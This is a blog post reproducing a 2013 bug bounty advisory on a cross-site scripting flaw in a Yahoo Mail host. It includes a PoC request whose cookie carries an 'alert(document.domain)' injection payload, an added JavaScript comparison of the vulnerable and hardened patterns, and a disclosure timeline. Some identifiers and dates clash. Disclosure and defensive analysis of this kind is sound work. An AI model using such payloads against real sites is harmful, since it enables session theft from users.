Yahoo Bug Bounty Program Vulnerability #3 XSS on de-mg42.mail.yahoo.com
Here is my last advisory, which I reported in 2013 to the Yahoo Bug Bounty Program. And again…the same story for this report as for my others :-/
If you’re interested, you can read it here:
Screenshots:
Video:
Here is my advisory for the XSS on de-mg42.mail.yahoo.com:
Advisory: Yahoo Bug Bounty Program Vulnerability #3 XSS on de-mg42.mail.yahoo.com
Advisory ID: SSCHADV2013-YahooBB-002
Author: Stefan Schurtz
Affected Software: Successfully tested on de-mg42.mail.yahoo.com
Vendor URL:
Vendor Status: Not tested anymore
Bounty: nothing
======================
Vulnerability Description
======================
The 'intl' parameter on "https://de-mg42.mail.yahoo.com/" is prone to a cross-site scripting vulnerability.
======================
PoC-Exploit
======================
GET https://de-mg42.mail.yahoo.com/neo/launch?.rand=02j5el0e9m3mr
Host: de-mg42.mail.yahoo.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: YM.SREQs.schurtz=1; YM.NEO_114841791630661482=width=1920&height=874; B=aj6vf6l8j20rv&b=4& d=itbFpMNpYFMz7rPwe5JFum_ghxk-&s=i8&i=lvGlArFYMBIJ47eKw1fV; RMBX=aj6vf6l8j20rv&b=3&s=0k&t=59; V=v=0.90&cc=0&m=0; POPUPCHECK=1387130698530;
adx=c322590@1386248182@1; T=z=bslqSBbANvSBRhTgC/z0ojCNjA2MAY2NjNPMzYwTjYxNDcxMT
&a=QAE&sk=DAA8V8EU20nhMO&ks=EAAl0SH4Wfzh6QOSww.4WR97g—~E&d=c2wBTVRjeE53RXhNVFE0TkRFM09URTJNekEyTmpFME9ESS0BYQFRQUUBZwFYR1lLREF
LVTdFWjU0SjY3QVJaUEYyMzZZSQFzY2lkAWJIVnpjWTF0a
DdTVFREVFJLZUtxem4yeC5DWS0BYWMBQUVERkQ5VWQBdGlwAWQ1OTc3RAFz
YwF3bAF6egFic2xxU0JBN0U-;F=a=5wuRvLEMvSo9VbE7dA3FBiS57T.ECJPqZKL7S
qUSshaxgafrUTyTA2TfmjWAGc1FiTDSLSw-
&b=_pW9; PH=l=de-DE&i=de&fn=K2_4Upj6Mg1KYq4D9FKN; SSL=v=1&s=ZKphB8TnY2DMWrNEU3WnQdsBp50y6G.DA.GMkzNJBkkaUPmmwLBscSpK5×5gJjBMR671vlpo
Basj8HY6cXSNbA—&kv=0; ywadp100034076556=3167627385; fpc100034076556=ZavCj2Fd|aEGcHAwNaa|fses100034076556=|aEGcHAwNaa|
ZavCj2Fd|fvis100034076556=|8Mo080oosT|8Mo080oosT|8Mo080oosT|8|8Mo080oosT|8Mo080oosT; ywadp1000357943879=4084605029; fpc1000357943879=ZbHoAVDq|0UsAOAwNaa|fses1000357943879=|0UsAOAwNaa|ZbHo
AVDq|fvis1000357943879=|8Mo0807780|8Mo0807780|8Mo0807780|8|8Mo0807780|8Mo0807780;
AO=o=0; YLS=v=1&p=1&n=0; ucs=bnas=0&eup=1; _br_uid_2=uid%3D9863339468277%3Av%3D10.6.1%3Ats%3D1386895411464%3Ahc%3D1; Y=v=1&n=d7kp7cfrj6gcm&l=i.i27khjp/o
&p=m2evvde012000000&iz=&r=sd&lg=de-DE&intl=dec52a6"-alert(document.domain)-"c8d9133635e; U=mt=fnqDoZ2MhYjxjMnSZ.dZc46HZp7QbCgwGOhf97k-&ux=u2JrSB&un=d7kp7cfrj6gcm; ypcdb=cf2c3147a30c5264ccbae29c07ec31b3; YM=v=2&u=bTYqAOaoqXPwtE2NaDnywgQ.MkXnpDL1MkqqIA—&d=&f=AAA&t=3bKrSB&s=55nr; DK=v=2&p=NnwyMzMwfFZpcnR1YWx8RGVza3RvcCBCcm93c2VyfHdpbmRvd3MgbnR8NS4x
Connection: keep-alive
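The PoC value closes a double-quoted string and places alert() between two subtraction operators, which points to reflection inside a JavaScript string literal; the advisory does not show the response, so that context is an assumption. The following added example (not part of the original advisory and not Yahoo's code) puts that pattern next to a hardened form; the function names, the `cfg` variable, the allowlist regex and the `us` fallback are hypothetical.

```javascript
// Constructed samples shaped like the "Y" cookie in the PoC (other fields shortened).
const POC_COOKIE = 'v=1&n=abc&lg=de-DE&intl=dec52a6"-alert(document.domain)-"c8d9133635e';
const BENIGN_COOKIE = 'v=1&n=abc&lg=de-DE&intl=de';

// Extract one sub-field from an "a=1&b=2" style cookie value.
function subField(cookieValue, name) {
  for (const pair of cookieValue.split('&')) {
    const i = pair.indexOf('=');
    if (i > 0 && pair.slice(0, i) === name) return pair.slice(i + 1);
  }
  return null;
}

// Assumed vulnerable pattern: raw value concatenated into a JS string literal.
function renderVulnerable(intl) {
  return 'var cfg = { intl: "' + intl + '" };';
}

// Serialize any value as a JS string literal that is safe inside <script>:
// JSON.stringify escapes quotes and backslashes; the replace covers HTML-significant
// characters and the U+2028/U+2029 line separators.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&\u2028\u2029]/g,
    c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0')
  );
}

// Hypothetical allowlist for locale codes such as "de" or "de-DE"; "us" is an assumed fallback.
const INTL_RE = /^[a-z]{2}(-[A-Z]{2})?$/;
function renderHardened(intl) {
  const safe = intl !== null && INTL_RE.test(intl) ? intl : 'us';
  return 'var cfg = { intl: ' + jsStringLiteral(safe) + ' };';
}

// Evaluate a rendered script with stubbed browser globals and collect alert() arguments.
function alertCalls(script) {
  const calls = [];
  new Function('alert', 'document', script)(v => calls.push(v), { domain: 'mail.example.test' });
  return calls;
}

const pocValue = subField(POC_COOKIE, 'intl');
console.log('vulnerable:', renderVulnerable(pocValue), alertCalls(renderVulnerable(pocValue)));
console.log('hardened:  ', renderHardened(pocValue), alertCalls(renderHardened(pocValue)));
```

Validation and output encoding are applied together here: the allowlist rejects anything that is not a locale code, and the encoder keeps the literal intact for fields that cannot be allowlisted.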
======================
Disclosure Timeline
======================
15-Dec-2013 - vendor informed by contact form (Yahoo Bug Bounty Program)
31-Dec-2013 – next message to the Yahoo Security Contact
04-Jan-2014 – feedback from vendor
04-Jan-2014 – vendor informed again about the three vulnerabilities
06-Jan-2014 – feedback from vendor
15-Jan-2014 – contact with Jeff Zingler (Threat Response@Yahoo)
16-Jan-2013 – contact with Jeff Zingler (Threat Response@Yahoo) // last contact
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2013-YahooBB-003.txt